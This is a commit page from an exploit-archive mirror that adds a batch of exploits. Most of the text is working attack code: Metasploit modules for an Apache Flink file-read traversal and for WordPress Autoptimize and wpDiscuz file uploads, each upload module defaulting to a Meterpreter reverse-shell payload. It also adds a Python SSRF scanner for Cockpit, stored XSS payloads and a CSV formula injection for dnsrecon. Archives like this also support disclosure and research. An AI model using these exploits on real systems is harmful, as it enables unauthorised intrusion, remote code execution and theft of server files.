bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-09

Browse source 
9 changes to exploits/shellcodes

dnsrecon 0.10.0 - CSV Injection

PHP Handicapper - 'Process_signup.php' HTTP Response Splitting
PHP Handicapper (2005) - 'Process_signup.php' HTTP Response Splitting
Life Insurance Management System 1.0 - Multiple Stored XSS
Online Doctor Appointment System 1.0 - Multiple Stored XSS
Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)
WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)
This commit is contained in:
Offensive Security 2021-01-09 05:01:55 +00:00
parent 62b3c868cf
commit 206c9f4f7e
10 changed files with 446 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

72
exploits/java/webapps/49398.rb Executable file
View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'Apache Flink File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
allowing arbitrary file read with the web server privileges
},
'Author' =>
[
'0rich1 - Ant Security FG Lab', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-17519'],
['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 05 2021'
))
register_options([
OptInt.new('DEPTH',[true,'Traversal Depth',12]),
OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])
])
end
def run_host(ip)
traversal = '..%252f' * datastore['DEPTH']
filename = datastore['FILEPATH'].gsub("/","%252f")
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),
})
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'apache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end

88
exploits/multiple/webapps/49397.txt Normal file
View file

@ -0,0 +1,88 @@
# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
# Date: 08.01.2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://cockpit-project.org/
# Version: v234
# Tested on: Ubuntu 18.04
#!/usr/bin/python3
import argparse
import requests
import sys
import urllib3
import time
from colorama import Fore, Style
from argparse import ArgumentParser, Namespace
from bs4 import BeautifulSoup
"""
Example scanning for internal server:
python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23
Example scanning for loopback interface of server:
python3 PoC.py --target 192.168.1.33:9090
Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
"""
def main():
dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
args: Namespace = parser.parse_args()
if args.target:
target = args.target
if args.scan:
scan = args.scan
if args.ports:
ports = args.ports
else:
ports = "22"
else:
scan = "127.0.0.1"
if args.ports:
ports = args.ports
else:
ports = "22"
cockpitReq(target, scan, ports)
def cockpitReq(target, scan, ports):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
portRange = ports.split(",")
for unsafe in portRange:
headers = {
"Host": str(target),
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Authorization": "Basic dW5zYWZlOmlubGluZQ==",
"X-Authorize": "",
"Connection": "close",
"Cookie": "cockpit=deleted",
}
req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False)
time.sleep(2)
soup = BeautifulSoup(req.text, 'html.parser')
responseCode = req.status_code
responseTime = str(req.elapsed)
if responseCode == 404:
print("Cockpit server was not found!")
elif responseCode == 401:
if soup.title.string == "Authentication failed":
print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!")
elif soup.title.string == "Authentication failed: no-host":
if responseTime > "0:00:10.000000":
print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!")
else:
print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!")
else:
print(Fore.RED + Style.BRIGHT +"[-] Error is occured!")
print("[-] One bad day!")
sys.exit(1)
else:
print("Something went wrong!")
main()

9
exploits/php/webapps/49395.txt Normal file
View file

@ -0,0 +1,9 @@
# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS
# Date: 4/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: linux / Lamp
Click on add payment once logged in. Put <script>alert(1)</script> and so on in all parameters. You will notice popup once you navigate to payments.

13
exploits/php/webapps/49396.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2021-01-08
# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
Step 2: then Click on the username and go to profile
Step 3: Click on Update profile.
Step 4: Input "<script>alert("craniums")</script>" in the field First Name,Last Name and Address.
Step 5: This Will trigger the payload each time you update or visit a new page.

109
exploits/php/webapps/49399.rb Executable file
View file

@ -0,0 +1,109 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress Autoptimize Authenticated File Upload',
'Description' => %q{
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,
allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
},
'Author' =>
[
'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'Thien Ngo - Suncsr Team' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-24948'],
['EDB', '48770'],
['WPVDB', '10372']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Targets' => [['WP Autoptimize 2.7.6', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-08-24'))
register_options(
[
OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),
OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])
])
end
def check
check_plugin_version_from_readme('autoptimize','2.7.7')
end
def ao_ccss_import_nonce(cookie)
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),
'cookie' => cookie,
'vars_get' => {
'page' => 'ao_critcss'
}
},5)
if res.code == 200
print_good("Found ao_ccss_import_nonce_code Value!")
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end
ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
return ao_ccss_import_nonce_code
end
def exploit
username = datastore['USERNAME']
password = datastore['PASSWORD']
print_status("Trying to login as #{username}")
cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])
if cookie.nil?
print_error("Unable to login as #{username}")
end
vars = ao_ccss_import_nonce(cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"
data = Rex::MIME::Message.new
data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
post_data = data.to_s
print_status("Uploading payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
})
if res.code == 200
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end
print_status("Calling uploaded file #{filename}")
send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)
end
end

106
exploits/php/webapps/49401.rb Executable file
View file

@ -0,0 +1,106 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files,
including PHP files, and achieve remote code execution on a vulnerable sites server.
},
'Author' =>
[
'Chloe Chamberland', # Vulnerability Discovery, initial msf module
'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '10333'],
['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wpDiscuz < 7.0.5', {}]],
'DisclosureDate' => 'Feb 21 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))
register_options [
OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]),
]
end
def check
check_plugin_version_from_readme('wpdiscuz','7.0.5')
end
def blogpath
datastore['BLOGPATH']
end
def find_wmusecurity_id
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5)
wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures
return wmusecurity_id
end
def exploit
wmusecurity_id = find_wmusecurity_id[0]
php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
data = Rex::MIME::Message.new
data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
data.add_part('1', nil, nil, 'form-data; name="postId"')
data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
post_data = data.to_s
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
time = Time.new
year = time.year.to_s
month = "%02d" % time.month
regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"")
if res
if res.code == 200 && res.body =~ /#{php_page_name}/
print_good("Payload uploaded as #{php_page_name}")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, "#{peer} - Server did not answer")
end
print_status("Calling payload...")
send_request_cgi(
{ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)},
5
)
end
end

37
exploits/python/local/49394.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: dnsrecon 0.10.0 - CSV Injection
# Author: Dolev Farhi
# Date: 2021-01-07
# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
# Version : 0.10.0
# Tested on: ParrotOS 4.10
dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:
_spf.example.com "test',=1+1337,'z"
user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
[*] Performing General Enumeration of Domain: _spf.example.com
[-] DNSSEC is not configured for _spf.example.com
[*] SOA ns-59.awsdns-07.com 205.1.1.1
[-] Could not Resolve NS Records for _spf.example.com
[-] Could not Resolve MX Records for _spf.example.com
[*] TXT _spf.example.com test',=1+1337,'z
[*] Enumerating SRV Records
[+] 0 Records Found
[*] Saving records to CSV file: ./file.csv
{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}
This output will then be rewritten into a CSV with this structure:
Type,Name,Address,Target,Port,String
SOA,ns-59.awsdns-07.com,205.1.1.1
TXT,_spf.example.com,,,,'test',=1+1337,'z'
The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:
Attribute Values
All printable ASCII characters are permitted in the attribute value.

6
exploits/windows/remote/46697.py
View file

@ -5,9 +5,9 @@
# Version: 3.008
# Tested on: Windows 10
Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
This script pops calc as proof of concept (albeit a bit slowly)
It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
#This script pops calc as proof of concept (albeit a bit slowly)
#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2

2
exploits/windows/remote/643.c
View file

@ -9,7 +9,7 @@
#include <netdb.h>
#include <string.h>
define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
#define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
#define port 110
/* revshell العراق القراصنة المجموعة*/

9
files_exploits.csv
View file

@ -11243,6 +11243,7 @@ id,file,description,date,author,type,platform,port
49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -30834,7 +30835,7 @@ id,file,description,date,author,type,platform,port
26463,exploits/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi,
26465,exploits/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php,
26466,exploits/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php,
26467,exploits/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php,
26467,exploits/php/webapps/26467.txt,"PHP Handicapper (2005) - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php,
26468,exploits/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,webapps,php,
26469,exploits/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,webapps,php,
26470,exploits/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,webapps,php,
@ -43601,3 +43602,9 @@ id,file,description,date,author,type,platform,port
49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php,
49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php,
49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,
49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,
49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
49401,exploits/php/webapps/49401.rb,"Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,

Can't render this file because it is too large.